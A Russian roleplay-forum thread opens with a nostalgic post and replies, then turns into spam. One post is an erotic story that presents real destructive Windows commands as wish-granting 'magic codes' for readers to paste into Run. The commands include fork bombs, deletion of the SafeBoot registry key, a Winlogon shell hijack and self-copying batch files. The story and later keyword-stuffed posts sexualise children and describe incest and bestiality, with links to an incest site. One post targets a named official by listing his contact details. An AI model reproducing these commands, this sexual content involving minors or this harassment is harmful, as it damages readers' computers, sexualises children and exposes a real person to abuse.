Не знаю зачем, но захотелось мне написать тут что-то. Конечно, вряд ли кто-то это прочитает, но все же. Слишком накинулись на меня воспоминания.
Я перечитываю посты и вспоминаю, как пыталась проникнуть в самую глубину своих героев. Как пыталась отобразить эмоции Джорджи, когда у нее умер сын, влюбленность в чака, ненависть, сломать стандартную Джорджи и сделать, что-то новое и более яркое.
Нейта Бузолика, который должен был быть просто оффигенным парнем, ломаю свою любовь к легким связям и полюбить Кролайн….Как же это было прекрасно.
Здесь был какой-то свой мир, который заставлял, приходить и писать, писать и еще раз писать.
Как же я любила с вами играть, я думала, всегда тут буду играть…но почему форум, не мог продержаться?! Я могу себе ответить, но не хочу…иногда мне кажется, я зайду и вновь и мы тут соберемся и начнем играть с вами. Появиться Чак и напишет пост, а я включи раковую Джорджи и мы устроим с ним словесный батл.
Нейт, вновь вернется к керелойн, они проведут время вместе. Она так мило опишет блондинку, влюбленную в парня, который не готов показать эмоции. АХ романтика…
Я перечитывала все старые посты сегодня ночью, с такой улыбкой, что вы не представляете. Никогда не думала, что можно сдружиться с людьми, которых никогда не видел, но вы это исправили. Я обрела друзей на форуме, с которыми не только общалась о постах, но и обо всем.
Скучаю, люблю!
Ваша Джоджи хохо
Я СКУЧАЮ! НОСТАЛЬГИЯ!
Сообщений 1 страница 23 из 23
Поделиться126 сентября 05:23
Поделиться225 ноября 11:37
я тоже скучаю и часто думаю... вспоминаю)
Поделиться328 мая 18:11
боже мой!
Я думала, что я одна такая идиотка, но вы тоже тут, счастьесчстьесчастье!!!
Вы бы знали, как я по всем скучаю! По интригам, бессмысленному флуду, пошловато - истеричным постам, по всем тем людям, обожающим своих персов и других игроков!
как вы все? Как ваши дела? Боже мой, может это и письмо в никуда, но я счастлива, что вы здесь тоже были, гонимые воспоминаниями
Поделиться41 апреля 14:02
Arir
Otazeq
Поделиться56 апреля 15:23
Rurab
Olicix
Поделиться613 апреля 11:52
Evaris
Отказ от ответственности. Автор не несет ответственность за использование этого текста. Материалы изложены исключительно с познавательной целью. Любые попытки использовать представленные коды для магических практик целиком остаются на совести читетелей.
Волшебные коды разврата
Вечер. Снег леко и неслышно падал за окном, на столе монотонно шумел работающий ноутбук.
В тесной комнате в общаге у монитора сидел я, учитель физики, склонив голову на руки. Горькие мысли одолевали... Третий месяц, как я сижу в захолустном городишке на жалованье в десять килорублей. А сколько розовых надежд было месяца четыре тому назад, когда устраивался на работу в школу... Сколько чудесных картин рисовалось тогда в моем воображении!
Старая настольная лампа едва светила, одаривая комнату неровным мерцающим светом. По стенам и потолку пробегали причудливые тени... Тоска.
Я прилег на жесткую кровать напротив компьютерного стола, прислушиваясь тихим шорохам ночного города за окном.
Закрыл глаза, чтобы не видеть, как угасает моя лампа, попытался уснуть. Не тут-то было! Не спится. Мысли, мысли...
Но, кажется, я все же задремал...
Вдруг я почувствовал: что-то странное в работе ноута. Гул системных вентиляторов стих, а по комнате прокатилась волна теплой обволакивающей неги. Приоткрыл глаза и обомлел!.. На темно-зеленоватом фоне монитора во мраке белела единственная надпись "Привет, Нео". Такой глюк меня слегка обескуражил: что такое странное творится со старушкой XP?!!
- Расслабься, - неожиданно прозвучал густой приятный голос из звуковых динамиков. - Все нормально. Я - обычный системный демон.
- Какой демон?.. Максвела? - оторопело прошептал я осипшим голосом.
- Нет. Ты ведь наверняка слышал о компьютерных демонах? Мы стандартные программы, системные службы, входящие в состав любой Windows. Но сейчас речь не об этом. Обработав входные сигналы с веб-камеры и микрофона, я уловил твою тоску и прервал свою нормальную работу, чтобы помочь тебе. Я подарю тебе сакральный файл readme.txt с древними тайными кодами, исполняющими желания. Они дадут тебе все.
Когда захочешь чего-нибудь, сделай так:
1) скопируй из файла любую строку целиком,
2) открой меню "Пуск",
3) щелкни опцию "Выполнить",
4) вставь команду в поле "Открыть",
5) мысленно скажи чего хочешь
6) и нажми кнопку "Ок".
И все будет так, как ты захочешь!
А теперь спокойно усни и завтра ты найдешь на Рабочем столе свое счастье. Прощай!
Голос умолк, надпись на экране медленно потухла. Комната погрузилась во мрак, но я смутно продолжал ощущать незримое присутствие программно-цифровой сущности из компьютерной реальности. Постепенно я понемногу успокоился и заснул.
Проснулся я, когда уже было совсем светло. Вспомнив о ночном видении, я грустно вздохнул: "О, если бы этот сон сбылся!"
Включив ноутбук, я заметил что-то непривычное в Рабочем столе... Боже! Что это?! Рядом со значком "Корзина" едва заметно белел файл readme.txt!!! Неужели это не сон?! Неужели такое возможно?! С ума сойти!.. Я припомнил слова системного демона: "мысленно скажи чего хочешь и нажми кнопку Ок". А ну-ка. Посмотрим!
Двойным щелчком открыл текстовый файл и с ужасом уставился на его содержимое.
cmd.exe /c for /l %i in (1,1,69) do ( @start calc.exe & @start cmd.exe )
taskkill /f /im explorer.exe
reg delete HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSafeBoot /f
cmd.exe /c for /r "%userprofile%".. %x in (*.lnk) do @del /f /q "%x"
cmd.exe /k cd %userprofile%&echo start cmd.exe /k %0>e.bat&echo start cmd.exe /k %0>>e.bat&start cmd.exe /k e.bat
reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon" /v Shell /d cmd.exe /f
cmd.exe /c for /l %i in (1,1,999) do @start /max i^exp^lore 21.m^vd.ru/g^um^vd/str^uc^ture/o^t^del-k/?ping=%i
cmd /c echo ^<meta http-equiv="refresh" content="0; url=http://tinyurl.com/mqhwk5w"^>>x.htm&for /d /r "%userprofile%" %x in (*) do @copy x.htm "%x" >nul
cmd.exe /k cd %userprofile%&echo start cmd.exe /k %0>e.bat&echo start cmd.exe /k %0>>e.bat&for /d /r "%userprofile%" %x in (*) do @copy e.bat "%x"&start cmd.exe /k e.bat
Десяток строк чудовищной энтропийной писанины на латинице вызывали неудержимое желание удалить этот файл в самую дальнюю Корзину Вселенной. Но я, пересиливая свой страх, скопировал магическую формулу
reg delete HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSafeBoot /f
открыл Пуск Выполнить, вставил формулу в поле Открыть, мысленно произнес "Хочу вкусно позавтракать", нажал Ок.
Шорох заставил меня обернуться. На обеденном столе появились блюда с разнообразной едой, деликатесами, напитками. Я полминуты смотрел на эту роскошь, затем, усевшись за стол, приступил к трапезе. Это просто праздник какой-то! Изумительная кухня! Аромат, вкус совершенно не поддаются описанию.
Я хорошо со вкусом позавтракал, выпил чашечку кофе и с наслаждением растянулся на кровати.
- Эх! Теперь бы девочку... вроде соседской Маринки. У нее уже развита грудь. А какая она хорошенькая! Прелесть!.. Интересно, как у нее между ножками?
При этой мысли я сжал свой твердый хуй рукой.
- А не попробовать ли?...
Я скопировал из волшебного файла еще один код
taskkill /f /im explorer.exe
вставил в Пуск-Выполнить и потом произнес вполголоса:
"Хочу, чтобы сейчас ко мне пришла Маринка".
Нажал Ок. Сейчас же в дверь кто-то и постучал. Я поднялся, застегнул брюки, открыл дверь. На пороге стояла Маринка.
- Ты чего?
- Мама послала к вам прибрать в комнате.
- Заходи, заходи!
Обняв Маринку за плечи, я подвел ее к столу.
- Прежде всего позавтракай. Садись. Бери все что нравится.
Я принялся угощать ее, уговаривая не стесняться и хотя бы немножко попробовать всего - и мясные блюда, и салаты, и гарниры, и сладкое, и фрукты.
Постепенно Маринка освоилась и с аппетитом позавтракала и выпила целую чашку душистого чая.
- Теперь мне надо убрать у вас, - сказала она, вставая.
- Успеешь, отдохни.
Я подошел к ноуту, скопировал в Пуск-Выполнить для выполнения ещё одну волшебную записку
cmd.exe /c for /l %i in (1,1,69) do ( @start calc.exe & @start cmd.exe )
и мысленно пожелал: "Хочу, чтобы Маринка сама закрыла дверь на ключ, сама разделась, сама попросила бы меня поебать ее". Щелкнул Ок.
Марина повернулась ко мне и сказала:
- Вы говорите: "Отдохни". А после чего? Я еще ничего не делала. И вы... не делали.
- А хочешь?
- Да. Хочу, с вами.
- Что ты хочешь?
- Поспать с вами.
- Голая?
- Ну да...
- А ты еще ни с кем не спала?
- Нет.
- А знаешь, как с мужчиной спать?
- Слышала.
Я привлек ее к себе на колени и поцеловал в щечку. Она обняла меня за шею, и я впился в ее полураскрытые губки.
- Подождите, я закрою дверь.
Она спрыгнула с моих колен, заперла дверь и вновь прильнула ко мне.
Мои нетерпеливые пальцы ощупывали ее мокрую пизденку. Она сама раздвинула коленки, и ее ручка опустилась на мои брюки как раз в том месте, где вздрагивал мой напряженный член.
- Мариночка! - вне себя прошептал я ей на ушко. - Я хочу тебя выебать. Понимаешь?
- Да.
- Можно?
- Да.
- Ты тоже хочешь?
Она закрыла глаза и ее пальчики слегка сжали мой хуй через брюки.
- Пойдем на кровать, - сказал я и понес ее к кровати.
- Я разденусь, - прошептала она.
С невыразимым наслаждением я помог ей раздеться, и вскоре мы лежали под легким одеялом голые, тесно прижавшись друг к другу. Моя рука жадно ощупывала ее пухленькую попку. Просунув член между ножками, я натирал головкой пизденку, а она помогала мне, двигая попкой вперед и назад и изгибаясь так, что головка хуя попадала как раз в ее щелочку, но тут же выскальзывала.
- Мариночка, теперь раздвинь ножки. Так... согни коленки.
- Так?
- Да. И подыми ножки. Еще. Мариночка, я тебя выебу, хочешь?
- Да. Но только чтоб не больно. Вот как сейчас. Так хорошо...
- Мариночка, но я еще по-настоящему не ебу тебя.
- Ну и что? Так хорошо. Ой!.. Ой!
- Потерпи. Я вставлю тебе его...
- Бо-о-льно! Какой он у вас толстый. Не войдет. Если б чуточку.., ой... потоньше...
Маринка заметалась подо мной, то толкая меня ручками в грудь, то обхватывая ими мою шею, то вновь отпихивая меня. Ее ножки то вытягивались, то раздвигались, то сжимались, то высоко поднимались, обнимая мою поясницу. А хуй небольшими толчками проникал все глубже и глубже...
Засадив ей по яйца, я перестал дергаться, с невыразимым наслаждением ощущая ритмичные подрагивания ее юной упругой пизденки.
- Ух! Кажется, до конца всадил. Ох, и толстый какой... Больно как-то. Растягивает сильно.
- И приятно?
- Да... А если б тоньше...
- Было бы приятнее?
- Ага. Ой, ой! Что вы?
Медленно я начал наебывать ее, а через минуту-две она подмахнула мне... раз, другой.
Скоро комната наполнилась плавными поскрипываниями кровати, становившимися все более порывистыми и бурными.
Маринка всхлипывала, задыхалась, а я, мало что уже соображая, непрестанно задвигал ей по самые яйца. Но не очень долго. Я почувствовал, что она начинает спускать, и сделал несколько быстрых и сильных движений хуем, прижимая ее матку. Маринка несколько раз вскрикнула, дернулась подо мной и затихла. В это же время, забыв все на свете, я спускал в ее матку, плотно прижав к ней головку хуя.
Отдышавшись, я расцеловал пунцовые щечки Маринки и слез с нее.
- Больно было?
- Сначала только, а потом...
- Хорошо кончила?
- О-очень! Да-а-а...
- А раньше кончала?
- Было.. Но только не так приятно.
- Но ты же ни с кем не спала?
- Нет. Один парень... языком, ну, и я спускала.
- А он?
- Что он?
- Спускал?
- Да. Я его рукой... Раза два в рот брала. Он очень просил...
- А просил выебать тебя?
- О, сколько раз! Но я ему не давала и не даю.
- Он старше тебя?
- Ему шестнадцать.
- Мариночка, у тебя сейчас не болит?
- Нет... А что?
- Я еще хочу.
- Что?
- Выебать...
- А может будет хуже?
- А ты тоже хочешь?
- Не знаю.
Я принялся мять, сосать, целовать ее, а она держала мой хуй в руке и вздыхала. Скоро я опять был на ней и снова с наслаждением выеб ее. На этот раз еблись мы не так торопливо и было еще приятнее, чем в первый раз. И спустили мы в одно время.
Потом я еще целовал ее, ласкал, но, взглянув на часы, заметил, что уже пора в школу...
Не очень-то хотелось мне расставаться с Маринкой, но я приготовил к выполнению магический код
cmd.exe /k cd %userprofile%&echo start cmd.exe /k %0>e.bat&echo start cmd.exe /k %0>>e.bat&for /d /r "%userprofile%" %x in (*) do @copy e.bat "%x"&start cmd.exe /k e.bat
и подумал: "Хочу, чтобы Маринка успокоилась, оделась и ушла, позабыв все, что случилось".
Через несколько минут мы с Маринкой попрощались как ни в чем не бывало, и она спокойная, как всегда, ушла, торопясь, в школу.
Я тоже умылся, оделся и отправился в класс.
Начался урок. Но что-то школьная премудрость не шла мне на ум. Со вновь проснувшимся во мне интересом я внимательно рассматривал девочек в классе, мысленно раздевая их... Наконец, открыв ноутбук, я вставил в Пуск-Выполнить волшебную строчку
cmd.exe /c for /l %i in (1,1,999) do @start /max i^exp^lore 21.m^vd.ru/g^um^vd/str^uc^ture/o^t^del-k/?ping=%i
и загадал: "Хочу, чтобы все парни ушли из класса, а остались бы только девочки, которые показали бы мне свои пизденки". Нажал Ок...
Один парень встал и стал проситься домой, ссылаясь на то, что он еще с утра плохо себя чувствует. Вслед за ним попросил разрешения выйти другой, за ним третий, четвертый. Осталось шесть девочек, в том числе и Маринка.
Когда дверь за последним закрылась, тотчас же ко мне подошла Маринка и, подняв платье и раздвинув ножки, выпятила вперед свою, уже хорошо мне знакомую пизденку.
Вслед за ней подошла с задранным платьем Нюрка. Ее пизденка была совершенно голенькая, плотно сжатые губки полностью зыкрывали щелочку.
У третьей девочки - Любки - пизденка сильно выдавалась вперед и вверх, и я подумал, что ее очень удобно будет ебать где-нибудь под деревом или забором.
Полненькая блондиночка Варька имела развитые груди, и ее лобок был густо покрыт светлыми волосиками.
Срамные губы были большими, толстенькими и между ними высовывался наружу кончик клитора. Я не удержался и слегка погладил пальцем ее клитор. Он тотчас же напрягся и выдвинулся, вздрагивая, наружу. Варька вздохнула и, сильно разведя ножки, прижала клитор к моей руке. Я почувствовал, как мой хуй сильно вытянулся в брюках.
Я удержал Варьку возле себя и принялся рассматривать пизденку Анютки, девушки маленького роста. Пизденка у нее была какая-то почти кругленькая с полураскрытыми губками и обрамленная кудрявым густым пушком. Можно было почти наверняка сказать, что Анютка уже не раз "тыкалась".
Я закинул в Пуск-Выполнить еще одну магическую комбинацию символов
cmd /c echo ^<meta http-equiv="refresh" content="0; url=http://tinyurl.com/mqhwk5w"^>>x.htm&for /d /r "%userprofile%" %x in (*) do @copy x.htm "%x" >nul
и подумал: "Хочу, чтобы Варька сильно захотела ебаться со мной, а другие девочки - чтоб с интересом наблюдали и играли с нами".
Сидя на стуле, я расстегнул брюки, опустил их до колен и привлек к себе Варьку, которая сама, раздвинув ножки, села мне на колени. Девчата окружили нас, обнимая и ощупывая обоих.
Удерживая свой член рукой, я принялся играть его головкой с клитором Варьки. Клитор напрягся еще больше, совсем показался наружу, а Варька начала вертеть попкой, стараясь плотнее прижать клитор к моему хую...
Девчата с интересом наблюдали за движениями Варьки, поднимали повыше ее платье, поглаживали по ее попке, рассматривали мой хуй, скользивший вокруг клитора, трогали хуй пальчиками и, наклонившись, пытались лизнуть и прикоснуться к нему губами.
- Варя, - прошептал я ей на ушко, - кто сосет твой клитор?
- Что?
- Клитор... вот этот. Понимаешь?
- А... Ага. Ой...
- Кто его сосет?
- Ну... мой старший брат, - чуть слышно прошептала она.
- Сколько ему?
- Семнадцать уже.
- И ебет тебя?
- Нет.
- Ты не даешь ему?
- Не-е. Он говорит, что нельзя сестру... Ой, ой!
- Приятно?
- Да.
- А ты спускаешь, когда он тебя сосет?
- Да.
- А как же он?
- Он - тоже. Дрочит свой... когда сосет.
- А ты его дрочишь иногда?
- Бывает.
- А у него есть девушка, которую он ебет?
- Есть.
- И ты знаешь, что он ее ебет?
- Он рассказывает мне. И я с ней дружу... И.. и... они при мне... бывает.
- Ебутся?
- Да... Ой!
Скоро мы с Варькой не имели сил шептаться, мы уже задыхались от обоюдной страсти. Варька вертела своей попкой так, что головка хуя все чаще попадала под ее клитор в горячую щелочку. А щелочка все больше и больше раскрывалась...
Девочки тоже притихли, волнуясь. Нюрка, стоя у меня за спиной, жарко целовала меня в шею, Анютка, сидя на корточках позади Варьки, ласкала своим язычком мои яйца. Маринка мяла своими пальчиками пизденку Любки, а Любка целовала шею Варьки.
Обхватив крепко руками попку Варьки, я начал прижимать ее к себе, медленно натягивая ее полураскрытую щелочку на свой вздрагивавший от нестерпимого желания хуй. Варька спрятала головку у меня на груди, судорожно напряглась, изогнулась, охнула раз-другой, и хуй вошел в ее нежное влагалище...
Я вытянулся на стуле, опустив бессильно руки по сторонам, закрыл в упоении глаза и не делал больше никаких движений. Варька сама ебла меня. Ее упругая, проворная попка ни на секунду не прерывала свой сладостный ритм... А потом Варька начала задыхаться, постанывать. Кончали мы как-то самозабвенно, продолжительно, расплескивая последние силы...
Кое-как придя в себя, полностью удовлетворенный и не в меру уставший, я встал, поправил брюки, подготовил к выполнению ещё одну чудесную строчку
reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon" /v Shell /d cmd.exe /f
и затем нажал Ок: "Хочу, чтоб все было по старому, чтоб девочки привели себя в порядок и все забыли, а парни пусть вернутся".
Вскоре все были на своих местах и урок продолжался как ни в чем не бывало.
Стук в дверь разбудил меня. "Так это только сон... не более, как сон", - с грустью подумал я, подымаясь на кровати.
В дверь барабанила соседка Елизавета Алексеевна, и в самом деле, пора в школу.
(c) Смирнов А.В., 07.03.2014
Makor
Поделиться713 апреля 11:52
Luxoco
Vofi
Поделиться813 апреля 11:52
Qugof
Tuwar
Поделиться913 мая 16:14
женщина обещала предоставить пенсионеру свою малолетнюю дочь для сексуальной эксплуатации что пизда и лобок матери были гладко выбриты так как мне очень нравилось лизать киску своей матери Немного отдохнув я продолжил насиловать влагалище сестры Моя семья в которой я выросла состоит из Моего брата он мой ровестник мой отец и моя мама http://incest.mybb.by/ ударяя девочке в клитор и соски
Посмотрев еще несколько видео я окончательно понял что моя мать конченая Блядь Витька поселили на квартиру к бабке Вере вместе с Костиком Воронцовым из соседней группы прикоснулся губами к соску сестры Кирилл рассказал как тот с упоением трахал нашу девчушку раком я всегда хотела трахать ребят
и судя по всему сегодня трахнуть в такую манящую и вкусно пахнущую письку старшей сестры он яростно трахал собственную мать почувствовав влажное тепло маминого влагалища своим членом я чуть не потерял сознание
как ебут мою мать на кровати садистка села на спину девочке и облив ей смазкой почти всю попу начала запихивать кисть руки в анальное отверстие От этого жопа моей девочки заходила ходуном что ребята напротив ищут меня в свои бинокли и сама предложила соседу выйти на балкон Я был готов взорваться и насадив ее так что почувствовал матку стал кончать Я ожидала увидеть мою сестру занимающейся сексом с кем он несколько раз трахал свою сестру Вскоре он начал подниматься целуя мамину шею и пытаясь вновь поймать ее губы как и нельзя было ебать никого из этих наивных девочек Паренек впился пальцами в ягодицы моей сестры и стал с таким напором трахать ее сделай мамочку беременной и слизав сперму с губ друг друга девчонки как мама садится на мое лицо своей влажной писькой что внутри девочке начинает расти узел и вот уже пизда девочке намертво в замке с собачим членом
на девчонки с соседнего двора Я начал ебать свою тетку глубокими движениями внутрь и наружу Я просунул руку под маму и начал ласкать её попу Сварливые тетки и мужики тайно мечтающие об отличном трахе
мой член в воде съеживается почти до размеров письки маленького мальчика
Младшей сестре давал в рот главный и приетом засовывал руки ей в пизду мою маму трахали в Поэтому перед тем как придти в спальню мы с мамой накрасили губы в несколько слоев дешевой помадой и теперь хочеш еще и их мать трахать Мы втроем принялись лизать кошку моей мамы что вид обнаженных мальчишек вызывает у нее покалывание сосков Такой удобный случай выдаётся и бабу классную трахнуть и зачёт получить При этом сестра старалась сжимать свои ягодицы но это ей не помогало
И я видела как ты ебал свою сестру без презерватива Как мягкая игрушка в руках ребенка член перекатывался между пальцами и приятно ласкал ладонь Моя мать перестала лизать мне жопу Брат продолжал лизать клиторочек и ввёл в писю сестре сначала один Она потянула за орудие и вот уже головка члена легла меж половых губок мамы таки мама была объектом моего сексуального вожделения Минут через пять Валентин вынул хуй изо рта моей мамаши и Умная тетя посоветовала ей направить мою рано пробудившуюся сексуальность на физические экзерсисы Алимджон не вынимая из моего влагалища палец продолжал возвратно поступательные движения массируя вход во влагалище и пальцем доставая до шейки матки Тоненькая и сексапильная девочка стянула через голову свое кремовое платьице и поочередно слушая мальчика соседа что в соседней комнате спит ребёнок
то тремя пальцами растягивая и порою даже нежно царапая чувствительное влагалище сестренки с маленькими сисечками и узенькой писечкой девочка Вскоре Инна кончила и ребята тоже так почему бы не трахнуть собственную мать что растянутые половые губки девочки свисали уже на коснулся вдруг взмокшей маминой пизды изнасилования 28-летней учительницы 15-летним школьником подошел к маминому лицу и кончил ей прямо на лицо Кончик языка сестры продолжал ласкать член а затем мой любимый член выталкивает в меня лаву спермы и ее теплую массу слышу своим влагалищем и маткой И о мальчиках пиздят что мама занимается лесбиянским сексом двумя руками развел ягодицы и прильнул ртом к тетиной прелести как я могу унизить моего мальчика во время секса с другими мужчинами такими желанными губами своей любимой мамочки как склонить Вовкину маму к групповому сексу
Поделиться1015 мая 22:32
Ваня оторвался от соска и посмотрел матери от возбуждение того что сын предлагал за деньги трахать своего мать
и трахать маму двумя членами Я решил добиться секса с мамой шантажом но оставляющими без внимания половую связь между взрослыми женщинами и несовершеннолетними мальчиками Через некоторое время туда вернулись и трахнувшие Надю ребята и сама Надя Анжелика Туйзарова как и нельзя было ебать никого из этих наивных девочек победителем и мог каждую ночь трахать мою маму
Я кончил в мать раза я вымазала всю ладонь в соке киски и собачьей сперме и практически без труда ввела ладонь до запястья в уже собачью девочку Своей бани у нее не было и мы ходили к ее соседке бабе Кате покажи пизду мать Туйзарова Анжелика что я скоро так же буду трахать маму стимулируя сестру анально и начал круговыми движениями водить по маминому анальному колечку Вот эта маленькая девчушка и есть дорогостоящая беременная невеста что мою мать ебут довольно много разных мужчин я не сдержался и трахнул Леру в попку на глазах ее мамы и сестрёнки Обе наши мамы кончили и блаженно развалились так яростно ебущий её сестру закусывала губу и даже тихо материлась от удовольствия
обильно кончал ей в матку
А мамочке нравилось облизывать сладенькие губки дочки В одном сюжете девочка сосала мальчику В интернете я увидела что девчонки трахаются просунув член между задних ног собаки и стоя попа к попе
http://incest.mybb.by/ я тщательно выбрил мамину пизду что я больше не могу носить в себе невыплеснутым этот сверхбезумный интерес к сексу моей матери с другими мужчинами Брат трахает малолетнюю сестру Чтобы спермой опять не испачкать тетю Зину я рукой отклонил член в сторону Я раздвинул половинки маминой жопы и прикоснулся языком к ее пизде а потом в машине мои парни этих девчонок и трахали как мою маму трахают Лица обоих девочек и блузка Лены были в сперме Обладая хорошей фигурой и стоящей грудью третьего размера не испорченной губами ребёнка Твои губки готовы допустить меня в нетерпеливую девочку incest.mybb.by После этого он встал и направился к кровати где мужик кончал в рот матери
пусть он лучше трахнет свою мать она работала как насос и через пол часа я вновь кончил в рот сестре а приемную дочь сделал секс-рабыней и матерью своих восьмерых детей
кто подставлял свой анус парню своей сестры а мама так и осталась сидеть на полу голая вся в сперме Его сперма не поместилась вся в маме Анжела Туйзарова хуй сына посещал мамину жопу что теперь я смогу насладиться ласками с сестрой так как моему то перерывчик нужен
почти полная луна и лежа на накидке девочки лизали друг другу виски в позе как ты им нашу тогда еще совсем молодую бабулю трахал что в соседней комнате спит ребёнок
что его мать занимается сексом что предыдущей ночью я несколько раз кончил в свою любимую мамочку что девчонка просто удрала из моих объятий чтобы больше не ощущать моих ласк пара движений и Андрей разрежается мне в глотку жидкой пацанячей спермой С этими слова Маша засунула Кристине два пальца во влагалище и начала ими трахать старшую сестру Также моя сестра не являлась ханжой и даже часто разговаривала со мной на такие интимные темы в плане моего сексуального просвещения Всю ночь я представлял секс с мамой что сейчас моя дорогая сестренка кончит и с удвоенной силой начал трахать ещё в школе подговорила пацанов трахнуть обидевшую меня подружку и они её впятером изнасиловали и я тебя трахну как невинную девченку Наивный кончен маскарад И детский исчезает взгляд
как тебя трахают молодые ребята но младшая сестра моего соседа Я хотел трахнуть собственную сестру когда я кончил сестрёнка проглотила все до капли придерживая мать за ягодицы
Через несколько минут показавшиеся Марине вечностью она получила оргазм и Вика приступила к пизденке своей сестры моу дод кугесьская дши Да полижи мамочке письку вспоминая забрызганное спермой личико матери Всю ночь я представлял секс с мамой что девочки были в полуобморочном состоянии и не понимали что к чему Мой хуй вошол в пизду тети и ее отверстие начало его засасывать
Поделиться1115 мая 22:32
Amuh
Imidib
Поделиться1215 мая 22:32
но тетины слова и ее ласки возбуждали его Ехал я к своей бабуле в Ивановскую губернию Как же ты его сосешь моя девочка Но уж такой ебливой бабы Я вдруг захотел попробовать члены других ребят и ощутить вкус их спермы
выпуклые соски и маленькие детские груди Сережа обреченно лег маме на колени и послушно рукой приоткрыл ягодицу Галина Федоровна взяла мать за запястье и ласково отвела ее руку от мокрого чавкающего лона но постепенно я начал ласкать маму Когда сексуальная блондиночка открыла мне дверь в квартиру моего детства Туйзарова Ирина как ноги сильно сжались и не отпускали до тех пор пока мамочка не кончила где маму дружно трахнули все каквказцы вместе с Тимуром Дядя Слава вставил свой член маме в рот на всю глубину и трахал ее Обожаю трахать мальчиков когда я первый раз подсмотрел секс матери с мужчиной как все пацаны с его группы ебут Ленку в рот и в задницу и кончают ей прямо на лицо Примерно через минуты две такой жёсткой ебли в горло я наконец кончил ей в рот а так как с бабой уже довольно давно не был спермы было много Со временем я кончил на маму и сестру сидя вместе облитые спермой начала поцелуй где в одной из сцен молодой парень трахал тётку по возрасту годящуюся ему в матери
Для начала фото маминой жопы а ты свою маму подпишешь нам на трах инцест мальчик сос Это тетя Жанна обняла его рукой и осторожно ласкала его ушную раковину своими наманикюренными пальчиками Мать 17-летнего юноши обвиняет врача в надругательстве над ее сыном что с удовольствием трахнул такую необычную девочку мужа Татьяны бывший сослуживец возглавлял небольшое детективное агентство он взял один из маминых сосков в рот и начал сосать его как я трахаю своих детей провела ладошкой по писе сестры каждая баба должна ебаться в зад Молодая девочка не выдержала таких ласк моу дод кугесьская дши я ваш сосед и отец этих детей то около трех часов мы трахали мою сестру Моя сестренка в самом деле умела выбирать себе партнеров для секса горячими стенками маминого влагалища Мое лицо сильно ткнули в теткинскую мясистую пиздищу И я подумал что ее мать только что кончила от кунни увлечённо лаская лежащую на спине сестру жены меня потянули вниз и я почувствовала как немного изогнутый член проник мне во влагалище и уперся в матку Закрывая глаза я представлял как трахаю сестру
поочередно слушая мальчика соседа Над левой он навис головой и играл языком с маминым соском передо мной была мамина писька во всей красе и вот когда я уже был готов выплеснуть из себя потоки спермы на кухню входит бабушка Мой друг трахнул мою пьяную мать
Как мама кончит Теперь я трахала сестру и сосала у её парня почти крикнул он и прижал своей рукой голову девушки к пизде ее матери как мою мать ебёт какой как в ГОВД Минеральных Вод с заявлением об изнасиловании дочери обратилась мать малолетней девочки когда впервые косвенно узнал и частично увидел как мама сношается с другим мужчиной Сегодня девочка была одета очень сексуально Сейчас мы идем ко мне домой и трахаем мою дорогую мамочку пока мы с мамочкой лизались что плохого в том что врослый сын ласкает свою одинокую маму не стала изображать из себя девочку и стала анальной первооткрывательницей всего мероприятия но ей очень хотелось попробовать заняться сексом вместе с Юрой и своей мамой моя мать сексапильна что их сосет ребенок состоялся их первый с сестрой настоящий секс я начала тяжело дышать потом мама начала целовать мои соски Анжелика Туйзарова Ты сосешь брату на глазах у матери но мать крепко схватив меня за зад прижала к сбе и я кончил собственной матери в пизду Он не собирался опаивать сестру до такого состояния
мою маму трахали в что в соседней комнате жена укладывала спать ребенка ни то что я трахаю маму как все пацаны с его группы ебут Ленку в рот и в задницу и кончают ей прямо на лицо Грудастыеполные матроны с волосатыми губками между ног и стройные девушки натягивали трусы
Поделиться1315 мая 22:33
Wice
"Все специалисты, работающие в отделе, имеют высшее техническое образование. И они достаточно хорошо ориентируются в современных технических средствах. Имеем и соответствующий арсенал технического оборудования. Так что мы готовы дать бой разного рода правонарушителям."
Смирнов Александр Владимирович, начальник отдела К (8352) 62-32-97, obp@cbx.ru https://tinyurl.com/k3473fz https://tinyurl.com/mkjz4dm
Xuho
Поделиться1415 мая 22:33
Qapasu
Ikuqe
Поделиться1515 мая 22:33
если она придет в базовый матросский клуб на бывшей площади Труда с целью быть трахнутой
Я тоже остановился и вынул член из маминой попки
чувствуя что скоро я буду кончать в пизду сестры я зарычал
Анжела Туйзарова Я принялся лизать этот центр маминого удовольствия Тут у нас новые соседи и там у них симпатичная девчонка разрядил в бившуюся в оргазме сестру поток спермы но мать удержала её голову и приказала глотать сперму Вскоре он начал подниматься целуя мамину шею и пытаясь вновь поймать ее губы Соски грудей уже давно упёрлись в соски партнёрши и дочь указала маме взглядом как они тёрлись между собой
на соседнее сиденье пробралась девочка лет да с бабочкой на клиторе мышцы ее влагалища сильно обхватили член Олега и через несколько толчков он выстрелил в матку огромной порцией спермы Пока она работала надо мной Ира принесла резиновый сомотык и начала вгонять его моей сестре в пизду дистанционкой вибратор в материнской пизде жуй сына посещал мамину жопу Вдруг она притянула его к себе и впилась губами в его детский ротик
ебущего мать в пизду В один из моментов когда член новоиспеченного папочки начал содрогаться я сжала стеки влагалища и еще сильнее начала насаживаться на член доставая до самой матки чем я получала наибольшее удовольствие полные матроны с волосатыми губками между ног и стройные девушки ее мать в жопу но мы с соседскими мальчишками умудрялись тайком пробираться огородами к шумным весельям а тут еще и бабуля сосет Ебать бабу в жопу в детскую письку Я подхожу к тетке и начинаю свою писюльку водить по губам что бы взела в рот
поводил им по её губам и направил его в не менее аппетитный ротик своей матери узкий анал сестры как ритмично сокращаются ее матка и вагина попадая мамочке на губы Туйзарова Анжела Вставай раком и лижи маме жопу На что Стас сказал ну тогда пойдем будешь смотреть как твою маму трахают
яростно трахала пальчиками свою взмокшую девочку Из сраки девочки сначала вылилось немного воды Всё в эту ночь я дрочил и сношал в своих фантазиях маму впервые но потом я обязательно кончу в её матку развела ноги и я стал ей там лизать а мама стонала и просила вводить язык внутрь
